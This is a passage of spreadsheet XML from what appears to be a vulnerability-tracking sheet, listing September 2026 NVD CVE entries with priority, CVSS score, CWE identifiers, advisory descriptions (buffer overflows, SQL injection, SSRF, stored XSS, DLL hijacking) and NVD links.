      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when validating large data buffers from external sources using addition to check buffer length.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25290</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54692</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-787</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. Prior to 1.0.0, sail_codec_load_frame_v8_xbm() in src/sail-codecs/xbm/xbm.c allocates the decoded pixel buffer using the X11 one-byte-per-literal layout, but an X10 static short file causes the flat decode loop to write two file-controlled bytes per literal. When ceil(width/8) produces an odd row stride, the X10 literal count includes a padding byte for every row, but the destination has no space for those bytes, so loading the XBM through sail_load_from_file, sail_load_from_memory, or sail_start_loading_* produces a forward heap overwrite that scales with image height. The X11 static char path is not affected. The overwrite can corrupt process state, cause reliable crashes, and potentially enable code execution in a susceptible consuming application. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54692</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81474</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Heap-based Buffer Overflow vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81474</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86320</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in flatpak-builder where Git hooks are not disabled when applying patch sources with use-git-am: true. An attacker who can provide a malicious source containing a Git post-applypatch hook can cause the hook to execute on the host during the build process, resulting in arbitrary code execution with the privileges of the user running flatpak-builder.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86320</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92838</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>0df08a0e-a200-4957-9bb0-084f562506f9</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>A DLL hijacking
vulnerability exists in the GeoVision GV-Remote E-Map desktop
application. The application loads one or more dynamic-link libraries (DLLs)
from an unsafe search path, allowing a local attacker to place a malicious DLL
in a location searched before the legitimate library location. If
successfully exploited, an attacker with local write access to the affected
directory could achieve arbitrary code execution in the security context of
the GV-Remote E-Map process.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92838</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93337</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>NetworkManager-l2tp contains an improper input validation vulnerability that allows local users with VPN connection creation permissions to inject arbitrary pppd directives by supplying mru or mtu property values containing trailing non-numeric content after a valid integer. Attackers can exploit the verbatim write of unvalidated strings into the pppd options file via write_config_option() to inject the plugin directive, causing the privileged pppd process to load an attacker-controlled shared object and achieve arbitrary code execution as root.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93337</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48977</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-123, CWE-1284, CWE-823</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>OpenSlide is a C library for reading whole slide image files. From 3.4.1 until 4.0.1, OpenSlide's parse_level0_xml() processing in src/openslide-vendor-ventana.c accepts nonpositive row or column tile counts from a crafted Ventana BIF file. The invalid counts produce attacker-controlled relative memory offsets and allow arbitrary values to be written at those offsets, affecting all supported platforms and configurations and resulting in a crash or potential arbitrary code execution. This issue is fixed in version 4.0.1.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48977</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50158</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>yutu is an AI-powered toolkit for managing and growing YouTube channels. Prior to 0.10.9, the caption-download MCP tool accepts a caller-controlled file parameter through cmd/caption/download.go and passes it to Caption.Download() in pkg/caption/caption.go, where os.Create() creates or truncates that path without using the pkg.Root confinement boundary backed by YUTU_ROOT. A principal able to invoke caption-download, including a local HTTP client when the MCP server runs with its default authentication-disabled configuration, can write downloaded caption bytes to any path writable by the yutu process outside YUTU_ROOT. This can overwrite application files, configuration, shell startup files, logs, or data and can cause persistent code execution or denial of service depending on the selected writable target. Live caption retrieval also requires usable service credentials and an accessible caption identifier. This issue is fixed in version 0.10.9.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50158</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53557</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, an authenticated user can supply a crafted sheet["tableName"] value in the Excel datasource configuration submitted through POST /api/v1/datasource/, and SQLBot stores that value without safe identifier handling. When the same datasource is later removed through DELETE /api/v1/datasource/{id}, the stored value is interpolated into datasource cleanup SQL and executed by PostgreSQL. This second-order SQL injection can invoke PostgreSQL COPY TO PROGRAM and execute arbitrary operating-system commands with the privileges of the postgres process inside the SQLBot container. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53557</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54339</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Glean is a self-hosted RSS reader and personal knowledge management tool. Prior to 0.2.6, POST /api/feeds/discover passes an attacker-supplied feed_url to discover_feed(feed_url), creates a subscription through FeedService.create_subscription(), and enqueues fetch_feed_task. The background path calls fetch_feed(feed.url) and parse_feed(), which assigns each RSS item link to ParsedEntry.url. The task then passes ParsedEntry.url to fetch_and_extract_fulltext(parsed_entry.url) without network-level validation in backend/packages/rss/glean_rss/extractor.py and backend/apps/worker/glean_worker/tasks/feed_fetcher.py. A malicious feed can therefore make the server request private, loopback, link-local, or cloud-metadata resources. The fetched response is stored in Entry.content and can be retrieved through GET /api/entries/{id}, producing non-blind server-side request forgery with full response disclosure. This can bypass network perimeters, probe internal services and ports, expose internal configuration or web content, and potentially disclose cloud metadata access tokens. This issue is fixed in version 0.2.6.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54339</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81546</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>The Affinity by Canva application before 3.3.0 (September 2026 release) did not perform adequate bounds checking when parsing Affinity document files leading to a stack-based buffer overflow. A threat actor could craft a Affinity document that when opened by a user in Affinity could result in arbitrary code execution.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81546</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45726</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-732</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. From 1.3.0 until 1.6.6 and 1.7.3, importing a standalone Talos cluster creates an ImportedClusterSecrets resource containing the cluster's complete CA secrets bundle. The access rules in internal/backend/runtime/omni/state_access.go allow an authenticated user with the Reader role to retrieve the resource through ResourceService if the importing actor has not rotated those secrets, exposing Kubernetes, Talos, and etcd CA private keys plus the service-account key. The Kubernetes CA private key permits certificate signing for privileged identities such as system:masters and provides control of the imported cluster outside Omni's authorization boundary, including its workloads, credentials, and secrets. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45726</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54506</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-185, CWE-79</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, app/controller/user/profile.php accepts the user[bio] field and passes stored content through sanitizeHTML() in system/functions.php, whose on* event-handler regular expression omits the forward-slash delimiter and whose do-while condition compares the string to itself, so forbidden nested tags are removed only once. An Author-role or higher user can submit solidus-prefixed event-handler markup or nested forbidden tags that survive sanitization. The stored bio is rendered without sufficient output encoding on /author/{username}, in the admin user-management view, and potentially in comment displays, causing attacker-controlled JavaScript to execute when unauthenticated visitors, administrators, or other users view the content. This can expose browser-session data and permit victim-context account actions, defacement, or phishing. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54506</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66618</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WP Maps &lt;= 4.9.9 versions.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66618</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66619</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Newsletters &lt;= 4.18 versions.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66619</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66624</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
